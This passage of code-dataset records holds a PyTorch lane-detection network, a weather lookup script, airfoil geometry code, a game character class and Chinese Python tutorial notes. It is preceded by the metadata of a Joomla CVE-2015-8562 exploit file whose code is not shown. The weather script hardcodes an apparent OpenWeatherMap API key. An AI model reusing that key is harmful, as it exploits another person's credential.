main()\r\n\r\n\r\n","sub_path":"Joomla/Joomla_1.5-3.4.5_反序列化_CVE-2015-8562.py","file_name":"Joomla_1.5-3.4.5_反序列化_CVE-2015-8562.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"111261391","text":"#--coding:utf-8--\nimport torch.nn as nn\nimport torch\nimport math\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"3x3 convolution with padding\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\n\nclass conv2DBatchNormRelu(nn.Module):\n def __init__(self, in_channels, n_filters, stride=1, k_size=3, padding=1, bias=True, dilation=1, with_bn=True):\n super(conv2DBatchNormRelu, self).__init__()\n\n conv_mod = nn.Conv2d(int(in_channels), int(n_filters), kernel_size=k_size, \n padding=padding, stride=stride, bias=bias, dilation=dilation)\n\n if with_bn:\n self.cbr_unit = nn.Sequential(conv_mod,\n nn.BatchNorm2d(int(n_filters)),\n nn.ReLU(inplace=True),)\n else:\n self.cbr_unit = nn.Sequential(conv_mod,\n nn.ReLU(inplace=True),)\n\n def forward(self, inputs):\n outputs = self.cbr_unit(inputs)\n return outputs\n\n\nclass sharedBottom(nn.Module):\n def __init__(self,):\n super(sharedBottom, self).__init__()\n self.conv1 = conv2DBatchNormRelu(3, 16, 2) \n self.conv2a1 = conv2DBatchNormRelu(16, 16, 2)\n self.conv2a2 = conv2DBatchNormRelu(16,8)\n self.conv2a3 = conv2DBatchNormRelu(8,4)\n self.conv2a4 = conv2DBatchNormRelu(4,4)\n self.conv2a_strided = conv2DBatchNormRelu(32,32,2)\n self.conv3 = conv2DBatchNormRelu(32,32,2)\n self.conv4 = conv2DBatchNormRelu(32,32,1)\n self.conv6 = conv2DBatchNormRelu(32,64,2)\n self.conv8 = conv2DBatchNormRelu(64,64,1)\n self.conv9 = conv2DBatchNormRelu(64,128,2)\n self.conv11 = conv2DBatchNormRelu(128,128,1)\n self.conv11_1 = conv2DBatchNormRelu(128,32,1)\n self.conv11_2 = conv2DBatchNormRelu(128,32,1)\n self.conv11_3 = conv2DBatchNormRelu(128,32,1)\n self.conv11_4 = conv2DBatchNormRelu(32,64,1)\n self.conv11_6 = conv2DBatchNormRelu(32,64,1)\n self.conv11_5 = conv2DBatchNormRelu(64,128,1)\n\n def forward(self, x):\n x = self.conv1(x)\n x1 = self.conv2a1(x)\n x2 = self.conv2a2(x1)\n x3 = self.conv2a3(x2)\n x4 = self.conv2a4(x3)\n x = torch.cat([x1, x2, x3, x4], dim = 1)\n x = self.conv2a_strided(x)\n x = self.conv3(x)\n x = self.conv4(x)\n x = self.conv6(x)\n x = self.conv8(x)\n x = self.conv9(x)\n x = self.conv11(x)\n x1= self.conv11_1(x)\n x2= self.conv11_2(x)\n x3= self.conv11_3(x)\n x4= self.conv11_4(x3)\n x6= self.conv11_6(x2)\n x5= self.conv11_5(x4)\n x = torch.cat([x1, x5, x6], dim = 1)\n return x\n\nclass 
laneNet(nn.Module):\n def __init__(self,):\n super(laneNet, self).__init__()\n self.conv11_7 = conv2DBatchNormRelu(224,128,1)\n self.conv11_8 = conv2DBatchNormRelu(128,128,1)\n self.conv11_9 = conv2DBatchNormRelu(128,128,1)\n self.conv12 = conv2DBatchNormRelu(128,16,1)\n self.conv13 = conv2DBatchNormRelu(16,8,1)\n self.conv14 = nn.Conv2d(8, 2, 1,stride = 1,padding = 0, bias=True)\n def forward(self, x):\n x = self.conv11_7(x)\n x = self.conv11_8(x)\n x = self.conv11_9(x)\n x = nn.Upsample(size=(45,53),mode='bilinear')(x)\n x = self.conv12(x)\n x = nn.Upsample(size=(177,209),mode='bilinear')(x)\n x = self.conv13(x)\n x = self.conv14(x)\n return x \n\nclass clusterNet(nn.Module):\n def __init__(self,):\n super(clusterNet, self).__init__()\n self.conv11_7 = conv2DBatchNormRelu(224,128,1)\n self.conv11_8 = conv2DBatchNormRelu(128,128,1)\n self.conv11_9 = conv2DBatchNormRelu(128,128,1)\n self.conv12 = conv2DBatchNormRelu(128,16,1)\n self.conv13 = conv2DBatchNormRelu(16,8,1)\n self.deconv1 = nn.ConvTranspose2d(128, 128, kernel_size=3, padding=1, stride=2, bias=True)\n self.deconv2 = nn.ConvTranspose2d(128, 128, kernel_size=3, padding=1, stride=2, bias=True)\n self.deconv3 = nn.ConvTranspose2d(128, 128, kernel_size=3, padding=1, stride=2, bias=True)\n self.deconv4 = nn.ConvTranspose2d(16, 16, kernel_size=3, padding=1, stride=2, bias=True)\n self.conv14 = nn.Conv2d(8, 4, 1,stride = 1,padding = 0, bias=True)\n def forward(self, x):\n x = self.conv11_7(x)\n x = self.deconv1(x)\n x = self.conv11_8(x)\n x = self.deconv2(x)\n x = self.conv11_9(x)\n x = self.deconv3(x)\n x = self.conv12(x)\n x = self.deconv4(x)\n x = self.conv13(x)\n x = self.conv14(x)\n return x \n\nclass insClsNet(nn.Module):\n def __init__(self,):\n super(insClsNet, self).__init__()\n self.conv11_7 = conv2DBatchNormRelu(224,128,1)\n self.conv11_8 = conv2DBatchNormRelu(128,128,1)\n self.conv11_9 = conv2DBatchNormRelu(128,128,1)\n self.conv12 = conv2DBatchNormRelu(128,64,1)\n self.conv13 = conv2DBatchNormRelu(64,64,1)\n self.global_pool = nn.AdaptiveAvgPool2d((1, 1))\n self.ins_cls_out = nn.Sequential()\n self.ins_cls_out.add_module('linear', nn.Linear(64, 1))\n self.ins_cls_out.add_module('sigmoid', nn.Sigmoid())\n\n\n def forward(self, x):\n x = self.conv11_7(x)\n x = self.conv11_8(x)\n x = self.conv11_9(x)\n x = self.conv12(x)\n x = self.conv13(x)\n x = self.global_pool(x)\n x = x.squeeze(3).squeeze(2)\n x_ins_cls = self.ins_cls_out(x)\n return x_ins_cls \n\nclass hNet(nn.Module):\n def __init__(self,):\n super(hNet, self).__init__()\n self.conv11_7 = conv2DBatchNormRelu(224,128,1)\n self.conv11_8 = conv2DBatchNormRelu(128,128,1)\n self.conv11_9 = conv2DBatchNormRelu(128,128,1)\n self.global_pool = nn.AdaptiveAvgPool2d((1, 1))\n self.h_cls_out = nn.Sequential()\n self.h_cls_out.add_module('linear1', nn.Linear(128, 256))\n self.h_cls_out.add_module('bn', torch.nn.BatchNorm1d(256))\n self.h_cls_out.add_module('relu', torch.nn.ReLU())\n self.h_cls_out.add_module('linear2', nn.Linear(256, 6))\n\n\n def forward(self, x):\n x = self.conv11_7(x)\n x = self.conv11_8(x)\n x = self.conv11_9(x)\n x = self.global_pool(x)\n x = x.squeeze(3).squeeze(2)\n x_h_cls = self.h_cls_out(x)\n return x_h_cls \n \nclass Net(nn.Module):\n def __init__(self):\n # nn.Module子类的函数必须在构造函数中执行父类的构造函数\n # 下式等价于nn.Module.__init__(self)\n super(Net, self).__init__()\n self.bottom = sharedBottom()\n self.sem_seg = laneNet()\n self.ins_seg = clusterNet()\n self.ins_cls = insClsNet()\n self.hnet = hNet()\n self._initialize_weights()\n\n def _initialize_weights(self):\n 
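# He (Kaiming) normal init for every convolution; BatchNorm layers start\n # as identity (weight=1, bias=0) so early training stays stable\n 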
for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight.data) # in-place initializer; the un-underscored kaiming_normal is deprecated\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n def forward(self, x):\n x = self.bottom(x)\n x_sem = self.sem_seg(x)\n x_ins = self.ins_seg(x)\n x_cls = self.ins_cls(x)\n x_hnet = self.hnet(x)\n return x_sem, x_ins, x_cls, x_hnet\n\n#net = Net()\n#print(net)\n","sub_path":"hnet/lanenet_hnet.py","file_name":"lanenet_hnet.py","file_ext":"py","file_size_in_byte":7495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"}
+{"seq_id":"414145576","text":"import requests\r\nfrom datetime import datetime\r\nimport simplejson as json\r\n\r\napi_key = '9c81e9a16bf7f8245ff0fa3838375055'\r\nlocation = input(\"Enter the city name:\")\r\n\r\ncomplete_api_link = \"https://api.openweathermap.org/data/2.5/weather?q=\"+location+\"&appid=\"+api_key\r\napi_link = requests.get(complete_api_link)\r\napi_data = api_link.json()\r\n\r\ntemp_city = ((api_data['main']['temp']) - 273.15)\r\nweather_desc = api_data['weather'][0]['description']\r\nhmdt = api_data['main']['humidity']\r\nwind_spd = api_data['wind']['speed']\r\ndate_time = datetime.now().strftime(\"%d %b %Y | %I:%M:%S %p\")\r\n\r\n\r\nprint(\"----------------------------------------------------------\")\r\nprint(\"Weather stats for - {} || {}\".format(location.upper(), date_time))\r\nprint(\"----------------------------------------------------------\")\r\n\r\nprint(\"Current temperature is: {:.2f} deg C\".format(temp_city))\r\nprint(\"Current weather desc :\",weather_desc)\r\nprint(\"Current Humidity :\",hmdt, '%')\r\nprint(\"Current Wind Speed :\",wind_spd,'kmph')\r\n\r\n\r\nprint()\r\n# keep the report lines as strings: print() returns None, so the original\r\n# x=print(...) assignments filled my_records with nulls in the JSON dump\r\nx = \"Weather stats for - {} || {}\".format(location.upper(), date_time)\r\ny = \"Current temperature is: {:.2f} deg C\".format(temp_city)\r\nz = \"Current weather desc : {}\".format(weather_desc)\r\na = \"Current Humidity : {} %\".format(hmdt)\r\nb = \"Current Wind Speed : {} kmph\".format(wind_spd)\r\n\r\nmy_records = {\"weather stats:\":x,\r\n \"temperature:\":y,\r\n \"weather desc:\":z,\r\n \"humidity:\":a,\r\n \"wind speed:\":b}\r\n\r\njson_obj = json.dumps(my_records)\r\n\r\nwith open(\"cyber_security_rj.txt\",\"w\") as f:\r\n f.write(json_obj)\r\n","sub_path":"cyber_security_Roanek_Jena.py","file_name":"cyber_security_Roanek_Jena.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"}
+{"seq_id":"302355608","text":"\r\n\"\"\"\r\nThis library generates airfoil and ellipse cross-sections as xyz point sets.\r\n\"\"\"\r\nimport bezier\r\nimport numpy as np\r\nimport math\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\n\r\n\"\"\"\r\nWe want to create a library that makes an airfoil class with attributes\r\n\r\nthetaBase=thetaEnd\r\n\r\n--> make option for inches or metric\r\n\"\"\"\r\ndef airfoil(numPoints,RT,camber,theta,zd):\r\n\r\n # honour the requested resolution; the hard-coded N=150 disagreed with\r\n # the z array of length 2*numPoints-2 returned at the end\r\n N = numPoints\r\n RT_rad=math.radians(RT)\r\n theta_rad=math.radians(theta)\r\n #Ref Dims\r\n Rc1_endpx,Rc1_endpy=camber*math.cos(RT_rad),camber*math.sin(RT_rad)\r\n\r\n Rc1_p3x = Rc1_endpx*(1-0.02) #+ offset\r\n Rc1_p3y = Rc1_endpy*(1+0.3) #+ offset\r\n Rc1_p2x = Rc1_p3x*0.8 #+ offset\r\n Rc1_p2y = Rc1_p3y*1.8 #+ offset\r\n\r\n Rc2_p3x = Rc1_endpx*(1+0.03) #+ offset\r\n Rc2_p3y = Rc1_endpy*(1-0.35) #+ offset\r\n Rc2_p2x = Rc1_p3x*0.9 #+ offset\r\n Rc2_p2y = Rc1_p3y*0.1 #+ offset\r\n\r\n #Actual\r\n 
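# Hypothetical usage: pts = airfoil(100, RT=10, camber=1.0, theta=25, zd=0.0)\r\n # gives [x, y, z] arrays of length 2*numPoints-2, roughly centred on the\r\n # chord. c1_* below are the upper-surface cubic-Bezier control points and\r\n # c2_* the lower-surface ones, offset from the reference (Rc*) dims above.\r\n 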
c1_endpx,c1_endpy=camber*math.cos(theta_rad),camber*math.sin(theta_rad)\r\n\r\n c1_p3x = c1_endpx - Rc1_endpx*(0.02)\r\n c1_p3y = c1_endpy + Rc1_endpy*(0.3)\r\n c1_p2x = c1_p3x - Rc1_p3x*0.2\r\n c1_p2y = c1_p3y + Rc1_p3y*0.8\r\n\r\n c2_p3x = c1_endpx + Rc1_endpx*(0.03)\r\n c2_p3y = c1_endpy - Rc1_endpy*(0.35)\r\n c2_p2x = c1_p3x - Rc1_p3x*0.1\r\n c2_p2y = c1_p3y - Rc1_p3y*0.9\r\n\r\n\r\n nodes1 = np.asfortranarray([[0.0, c1_p2x, c1_p3x , c1_endpx],[0.0, c1_p2y, c1_p3y, c1_endpy],])\r\n nodes2 = np.asfortranarray([[0.0, c2_p2x, c2_p3x , c1_endpx],[0.0, c2_p2y, c2_p3y, c1_endpy],])\r\n\r\n top,bottom= bezier.Curve(nodes1, degree=3), bezier.Curve(nodes2, degree=3)\r\n s_vals = np.linspace(0,1,N)\r\n top,bottom = top.evaluate_multi(s_vals), bottom.evaluate_multi(s_vals)\r\n\r\n x=np.concatenate( [ top[0],bottom[0][1:len(bottom[0])-1][::-1] ] )\r\n y=np.concatenate( [ top[1],bottom[1][1:len(bottom[1])-1][::-1] ] )\r\n\r\n #C=[np.array(x) - max(x)/2, np.array(y) - max(y)/2]\r\n\r\n # fig = plt.figure()\r\n # ax = fig.gca(projection='3d')\r\n # # ax.plot( C[0],C[1])\r\n # # #ax.plot( [0.2,3,4], [2,3,4], [1,5,6])\r\n # # plt.show()\r\n\r\n return [np.array(x)-max(x)/2,np.array(y)-max(y)/2,np.full((2*numPoints-2,),zd)]\r\n\r\ndef ellipse(numPoints,camber, aoa,zd):\r\n \"\"\"\r\n Create an ellipse in xyz space based on given camber z coord and angle\r\n of attack (aoa)\r\n \"\"\"\r\n a,b,theta0,N=camber/2,camber/4,math.radians(aoa),numPoints\r\n\r\n #formula for rotated ellipse\r\n x=[a*math.cos(t)*math.cos(theta0)-b*math.sin(t)*math.sin(theta0) for t in np.linspace(0,2*3.14,N)]\r\n y=[a*math.cos(t)*math.sin(theta0)+b*math.sin(t)*math.cos(theta0) for t in np.linspace(0,2*3.14,N)]\r\n\r\n return np.array([x,y,np.full( (numPoints,),zd)] )\r\n","sub_path":"prop-gen-tool/airfoils.py","file_name":"airfoils.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"156413479","text":"from Unit import *\nfrom random import randint\nfrom Locations import *\n\nclass Char(Unit):\n def __init__(self, race, name, level, location):\n self.name = name\n self.race = race\n self.level = level\n self.stat_str = 0\n self.stat_dex = 0\n self.stat_con = 0\n self.health = 0\n self.max_health = 0\n self.exp = 0\n self.energy = 0\n self.max_energy = 100\n self.location = location\n self.char_stat_creation()\n\n\n def __repr__(self):\n return \"Greetings, %s, the %s.\" % (self.name, self.race)\n\n exp_for_level_size_dict = {1: 100, 2: 250, 3: 475, 4: 820, 5: 1330, 6: 2090, 7: 3230, 8: 4940, 9: 7500, 10: 11350}\n\n def gather_resources(self, resource):\n a = False\n b = randint(resource.min_amount, resource.max_amount)\n self.energy -= resource.energy_cost\n for n in self.inventory:\n if resource.name == n:\n a = True\n if a == True:\n self.inventory[resource.name] += b\n print(\"You have gathered %i %s\" % (b, resource.name))\n print(self.inventory)\n # print(\"Now you have %i %s in your backpack\" % (self.inventory[resource.name], resource.name))\n else:\n self.inventory[resource.name] = b\n print(\"You have gathered %i %s\" % (b, resource.name))\n print(self.inventory)\n # print(\"Now you have %i %s in your backpack\" % (self.inventory[resource.name], resource.name))\n\n def level_up(self):\n if self.exp >= self.exp_for_level_size_dict[self.level]:\n self.level += 1\n self.check_health()\n self.creation()\n\n print(\"Congratulation! 
You are now level %i\" % self.level)\n\n def combat_victory(self, monster):\n exp = monster.gives_exp + randint(0, monster.gives_exp / 10)\n self.exp += exp\n print(\"You have gained %i experience\" % exp)\n print(\"You now have %i\" % self.exp)\n self.level_up()\n monster.respawn()\n\n def char_stat_creation(self):\n if self.race == \"Elf\":\n self.stat_str = 10\n self.stat_dex = 16\n self.stat_con = 8\n elif self.race == \"Orc\":\n self.stat_str = 14\n self.stat_dex = 8\n self.stat_con = 12\n elif self.race == \"Human\":\n self.stat_str = 10\n self.stat_dex = 12\n self.stat_con = 12\n self.check_health()\n self.creation()\n\n def show_my_health(self):\n print(\"You have %i con\" % self.stat_con)\n print(\"You have %i health left\" % self.health)\n\n def stat_change(self, stat, value): # Stat change and announce the result\n if stat == 'con':\n self.stat_con += value\n self.check_health()\n return print(\"Yor constitution is increased by %i and now it is %i\" % (value, self.stat_con))\n elif stat == 'dex':\n self.stat_dex += value\n self.creation()\n return print(\"Yor dexterity is increased by %i and now it is %i\" % (value, self.stat_dex))\n elif stat == 'str':\n self.stat_str += value\n self.creation()\n return print(\"Yor strength is increased by %i and now it is %i\" % (value, self.stat_str))\n else:\n return print(\"There is no such stat\")\n\n def death(self, reason):\n self.game_over(reason)\n\n\n def game_over(self, reason):\n self.is_alive = False\n print(\"You are dead !!! GAME OVER\")\n print(reason)\n\n","sub_path":"Char.py","file_name":"Char.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"405205473","text":"import random\n\"\"\"\n基本数据类型\n\nmy_str = 'hello world'\nmy_int = 10\nmy_float = 2.5\nmy_bool = False\nprint(type(my_str))\nprint(type(my_bool))\nprint(type(my_float))\nprint(type(my_int))\n\"\"\"\n\n\n\"\"\"\n类型转换\n\na = int(input('a='))\nb = int(input('b='))\nprint('%d+%d=%d' % (a, b, a+b))\n\"\"\"\n\n\"\"\"\n华氏度换算摄氏度\nC=(F - 32) \\div 1.8\n\nf = float(input('f'))\nc = (f - 32) / 1.8\nprint('c:%f' % c)\n\"\"\"\n\"\"\"\n计算圆形周长和面积\n\npi = 3.14\nr = float(input('r:'))\ns = r*r*pi\nd = 2*pi*r\nprint('s=%f,d=%f' % (s, d))\n\"\"\"\n\"\"\"\n猜数字游戏\n计算机出一个1~100之间的随机数由人来猜\n计算机根据人猜的数字分别给出提示大一点/小一点/猜对了\n\nVersion: 0.1\nAuthor: 骆昊\n\n\nanswer = random.randint(1, 100)\ncounter = 0\nwhile True:\n counter += 1\n number = int(input('请输入: '))\n if number < answer:\n print('大一点')\n elif number > answer:\n print('小一点')\n else:\n print('恭喜你猜对了!')\n break\nprint('你总共猜了%d次' % counter)\nif counter > 7:\n print('你的智商余额明显不足')\n\"\"\"\n\n\"\"\"\n定义函数\n\n\n\ndef factorial(num):\n result = 1\n for i in range(1, num+1):\n result = result * i\n return result\n\n\na = int(input('input a number:'))\nprint(factorial(a))\n\n\n\"\"\"\n\"\"\"\n函数传参\n\n\n\ndef add(a=3, b=6, c=7):\n return b\n\n\nmy_sum = add(1, c=2, b=3)\nprint(my_sum)\n\"\"\"\n\n\"\"\"\n可变参数\n\n\n\ndef add(*args):\n result = 0\n for i in args:\n result += i\n return result\n\n\nprint(add(1, 2, 3, 4))\n\"\"\"\n\"\"\"\n用模块管理函数\n\nfrom module1 import foo\nfoo()\n\nimport module1 as m1\nm1.foo()\n\"\"\"\n\"\"\"\n转义字符\n\ns1 = 'hello\\n'\ns2 = r'hello\\n'\nprint(s1, s2, end='')\n\"\"\"\n\"\"\"\n字符串的运算\n\ns1 = 'hello' * 3\ns2 = 'world'\ns1 += s2\nprint(s1)\nprint('ll' in s1) # 成员运算\n# 切片\nprint(s1[0])\nprint(s1[2:5])\nprint(s1[2:21:2]) # 开始索引:结束索引:增量\nprint(s1[-3:-1])\nprint(s1[-1:-21:-1])\n\"\"\"\n\"\"\"\n字符串的处理\n\nstr1 = 'hello, world!'\n# 
通过内置函数len计算字符串的长度\nprint(len(str1)) # 13\n# 获得字符串首字母大写的拷贝\nprint(str1.capitalize()) # Hello, world!\n# 获得字符串每个单词首字母大写的拷贝\nprint(str1.title()) # Hello, World!\n# 获得字符串变大写后的拷贝\nprint(str1.upper()) # HELLO, WORLD!\n# 从字符串中查找子串所在位置\nprint(str1.find('or')) # 8\nprint(str1.find('shit')) # -1\n# 与find类似但找不到子串时会引发异常\n# print(str1.index('or'))\n# print(str1.index('shit'))\n# 检查字符串是否以指定的字符串开头\nprint(str1.startswith('He')) # False\nprint(str1.startswith('hel')) # True\n# 检查字符串是否以指定的字符串结尾\nprint(str1.endswith('!')) # True\n# 将字符串以指定的宽度居中并在两侧填充指定的字符\nprint(str1.center(50, '*'))\n# 将字符串以指定的宽度靠右放置左侧填充指定的字符\nprint(str1.rjust(50, ' '))\nstr2 = 'abc123456'\n# 检查字符串是否由数字构成\nprint(str2.isdigit()) # False\n# 检查字符串是否以字母构成\nprint(str2.isalpha()) # False\n# 检查字符串是否以数字和字母构成\nprint(str2.isalnum()) # True\nstr3 = ' jackfrued@126.com '\nprint(str3)\n# 获得字符串修剪左右两侧空格之后的拷贝\nprint(str3.strip())\n\"\"\"\n\"\"\"\n列表的使用\n\nlist1 = [1, 3, 5, 7, 100]\nprint(list1) # [1, 3, 5, 7, 100]\n# 乘号表示列表元素的重复\nlist2 = ['hello'] * 3\nprint(list2) # ['hello', 'hello', 'hello']\n# 计算列表长度(元素个数)\nprint(len(list1)) # 5\n# 下标(索引)运算\nprint(list1[0]) # 1\nprint(list1[4]) # 100\n# print(list1[5]) # IndexError: list index out of range\nprint(list1[-1]) # 100\nprint(list1[-3]) # 5\nlist1[2] = 300\nprint(list1) # [1, 3, 300, 7, 100]\n# 通过循环用下标遍历列表元素\nfor index in range(len(list1)):\n print(list1[index])\n# 通过for循环遍历列表元素\nfor elem in list1:\n print(elem)\n# 通过enumerate函数处理列表之后再遍历可以同时获得元素索引和值\nfor index, elem in enumerate(list1):\n print(index, elem)\n\"\"\"\n\"\"\"\n列表元素的添加与删除\n\nlist1 = [1, 3, 5, 7, 100]\n# 添加元素\nlist1.append(200)\nlist1.insert(1, 400)\n# 合并两个列表\n# list1.extend([1000, 2000])\nlist1 += [1000, 2000]\nprint(list1) # [1, 400, 3, 5, 7, 100, 200, 1000, 2000]\nprint(len(list1)) # 9\n# 先通过成员运算判断元素是否在列表中,如果存在就删除该元素\nif 3 in list1:\n list1.remove(3)\nif 1234 in list1:\n list1.remove(1234)\nprint(list1) # [1, 400, 5, 7, 100, 200, 1000, 2000]\n# 从指定的位置删除元素\nlist1.pop(0)\nlist1.pop(len(list1) - 1)\nprint(list1) # [400, 5, 7, 100, 200, 1000]\n# 清空列表元素\nlist1.clear()\nprint(list1) # []\n\"\"\"\n\"\"\"\n列表的排序\n\nlist1 = ['orange', 'apple', 'zoo', 'internationalization', 'blueberry']\nlist2 = sorted(list1)\n# sorted函数返回列表排序后的拷贝不会修改传入的列表\n# 函数的设计就应该像sorted函数一样尽可能不产生副作用\nlist3 = sorted(list1, reverse=True)\n# 通过key关键字参数指定根据字符串长度进行排序而不是默认的字母表顺序\nlist4 = sorted(list1, key=len)\nprint(list1)\nprint(list2)\nprint(list3)\nprint(list4)\n# 给列表对象发出排序消息直接在列表对象上进行排序\nlist1.sort(reverse=True)\nprint(list1)\n\"\"\"\n\"\"\"\n生成式和生成器\n\nimport sys\nf = [x for x in range(1, 10)]\nprint(f)\nf = [x + y for x in 'ABCDE' for y in '1234567']\nprint(f)\n# 用列表的生成表达式语法创建列表容器\n# 用这种语法创建列表之后元素已经准备就绪所以需要耗费较多的内存空间\nf = [x ** 2 for x in range(1, 1000)]\nprint(sys.getsizeof(f)) # 查看对象占用内存的字节数 9024\n# 请注意下面的代码创建的不是一个列表而是一个生成器对象\n# 通过生成器可以获取到数据但它不占用额外的空间存储数据\n# 每次需要数据的时候就通过内部的运算得到数据(需要花费额外的时间)\nf = (x ** 2 for x in range(1, 1000))\nprint(sys.getsizeof(f)) # 相比生成式生成器不占用存储数据的空间 88\nfor val in f:\n print(val)\n\"\"\"\n\"\"\"\n定义生成器\n\n\n\ndef fib(n):\n a, b = 0, 1\n for _ in range(n):\n a, b = b, a + b\n yield a\n\n\ndef main():\n for val in fib(20):\n print(val)\n\n\nif __name__ == '__main__':\n main()\n\"\"\"\n\"\"\"\n元组\n\n# 元组中的元素是无法修改的,事实上我们在项目中尤其是多线程环境(后面会讲到)中可能更喜欢使用的是那些不变对象(一方面因为对象状态不能修改,\n# 所以可以避免由此引起的不必要的程序错误,简单的说就是一个不变的对象要比可变的对象更加容易维护;另一方面因为没有任何一个线程能够修改不变对\n# 象的内部状态,一个不变对象自动就是线程安全的,这样就可以省掉处理同步化的开销。一个不变对象可以方便的被共享访问)。所以结论就是:如果不需\n# 要对元素进行添加、删除、修改的时候,可以考虑使用元组,当然如果一个方法要返回多个值,使用元组也是不错的选择。\n# 元组在创建时间和占用的空间上面都优于列表。\n# 定义元组\nt = ('骆昊', 38, True, '四川成都')\nprint(t)\n# 
获取元组中的元素\nprint(t[0])\nprint(t[3])\n# 遍历元组中的值\nfor member in t:\n print(member)\n# 重新给元组赋值\n# t[0] = '王大锤' # TypeError\n# 变量t重新引用了新的元组原来的元组将被垃圾回收\nt = ('王大锤', 20, True, '云南昆明')\nprint(t)\n# 将元组转换成列表\nperson = list(t)\nprint(person)\n# 列表是可以修改它的元素的\nperson[0] = '李小龙'\nperson[1] = 25\nprint(person)\n# 将列表转换成元组\nfruits_list = ['apple', 'banana', 'orange']\nfruits_tuple = tuple(fruits_list)\nprint(fruits_tuple)\n\"\"\"\n\"\"\"\n使用集合\nPython中的集合跟数学上的集合是一致的,不允许���重复元素,而且可以进行交集、并集、差集等运算。\n\n\n# 创建集合的字面量语法\nset1 = {1, 2, 3, 3, 3, 2}\nprint(set1) # {1, 2, 3},集合元素不重复\nprint('Length =', len(set1))\n# 创建集合的构造器语法(面向对象部分会进行详细讲解)\nset2 = set(range(1, 10))\nset3 = set((1, 2, 3, 3, 2, 1))\nprint(set2, set3)\n# 创建集合的推导式语法(推导式也可以用于推导集合)\nset4 = {num for num in range(1, 100) if num % 3 == 0 or num % 5 == 0}\nprint(set4)\n\nset1.add(4)\nset1.add(5)\nset2.update([11, 12])\nset2.discard(5) # 删除元素\nif 4 in set2:\n set2.remove(4)\nprint(set1, set2)\nprint(set3.pop()) # 取出第一个元素\nprint(set3)\n\nset1 = {1, 2, 3, 4, 5}\nset2 = {3, 4, 5, 6, 7}\n# 集合的交集、并集、差集、对称差运算\nprint(set1 & set2) # 交集\n# print(set1.intersection(set2))\nprint(set1 | set2) # 并集\n# print(set1.union(set2))\nprint(set1 - set2) # A-B\n# print(set1.difference(set2))\nprint(set1 ^ set2) # 并集-交集\n# print(set1.symmetric_difference(set2))\n# 判断子集和超集\nprint(set2 <= set1) # set2 是 set1 的子集\n# print(set2.issubset(set1))\nprint(set3 <= set1)\n# print(set3.issubset(set1))\nprint(set1 >= set2) # set2 是 set1 的子集\n# print(set1.issuperset(set2))\nprint(set1 >= set3)\n# print(set1.issuperset(set3))\n\"\"\"\n\"\"\"\n字典\n\n# 创建字典的字面量语法\nscores = {'骆昊': 95, '白元芳': 78, '狄仁杰': 82}\nprint(scores)\n# 创建字典的构造器语法\nitems1 = dict(one=1, two=2, three=3, four=4)\n# 通过zip函数将两个序列压成字典\nitems2 = dict(zip(['a', 'b', 'c'], '123'))\n# 创建字典的推导式语法\nitems3 = {num: num ** 2 for num in range(1, 10)} # ** : 幂\nprint(items1, items2, items3)\n# 通过键可以获取字典中对应的值\nprint(scores['骆昊'])\nprint(scores['狄仁杰'])\n# 对字典中所有键值对进行遍历\nfor key in scores:\n print(f'{key}: {scores[key]}')\n# 更新字典中的元素\nscores['白元芳'] = 65\nscores['诸葛王朗'] = 71\nscores.update(冷面=67, 方启鹤=85)\nprint(scores)\nif '武则天' in scores:\n print(scores['武则天'])\nprint(scores.get('武则天'))\n# get方法也是通过键获取对应的值但是可以设置默认值\nprint(scores.get('武则天', 60))\n# 删除字典中的元素\nprint(scores.popitem())\nprint(scores.popitem())\nprint(scores.pop('骆昊', 100))\n# 清空字典\nscores.clear()\nprint(scores)\n\"\"\"\n\"\"\"\n面向对象\n在实际开发中,我们并不建议将属性设置为私有的,因为这会导致子类无法访问(后面会讲到)。\n所以大多数Python程序员会遵循一种命名惯例就是让属性名以单下划线开头来表示属性是受保护\n的,本类之外的代码在访问这样的属性时应该要保持慎重。这种做法并不是语法上的规则,单下划\n线开头的属性和方法外界仍然是可以访问的,所以更多的时候它是一种暗示或隐喻\n\n\n\nclass Student(object):\n\n # __init__是一个特殊方法用于在创建对象时进行初始化操作\n # 通过这个方法我们可以为学生对象绑定name和age两个属性\n def __init__(self, name='jiang', age=21):\n self.name = name\n self.age = age\n\n def study(self, course_name):\n print('%s正在学习%s.' % (self.name, course_name))\n\n # PEP 8要求标识符的名字用全小写多个单词用下划线连接\n # 但是部分程序员和公司更倾向于使用驼峰命名法(驼峰标识)\n def watch_movie(self):\n if self.age < 18:\n print('%s只能观看《熊出没》.' % self.name)\n else:\n print('%s正在观看岛国爱情大电影.' 
% self.name)\n\n\ndef main():\n # 创建学生对象并指定姓名和年龄\n stu1 = Student('骆昊', 38)\n # 给对象发study消息\n stu1.study('Python程序设计')\n # 给对象发watch_av消息\n stu1.watch_movie()\n stu2 = Student('王大锤', 15)\n stu2.study('思想品德')\n stu2.watch_movie()\n stu3 = Student()\n stu3.watch_movie()\n\n\nif __name__ == '__main__':\n main()\n\"\"\"\n\"\"\"\n访问器和修改器\n\n\n\nclass Student(object):\n def __init__(self, name, identify_code):\n self._name = name\n self._identify_code = identify_code\n\n @property # 访问器\n def name(self):\n return self._name\n\n @property\n def identify(self):\n return self._identify_code\n\n @name.setter # 修改器\n def name(self, name):\n self._name = name\n\n\nstu1 = Student('jiang', 25)\nstu1.name = 'John'\nstu1.sex = 'male'\nprint(stu1.name)\nprint(stu1.identify)\nprint(stu1.sex)\n\"\"\"\n\"\"\"\n_slots_ 魔法\n\n\n\nclass Person(object):\n\n # 限定Person对象只能绑定_name, 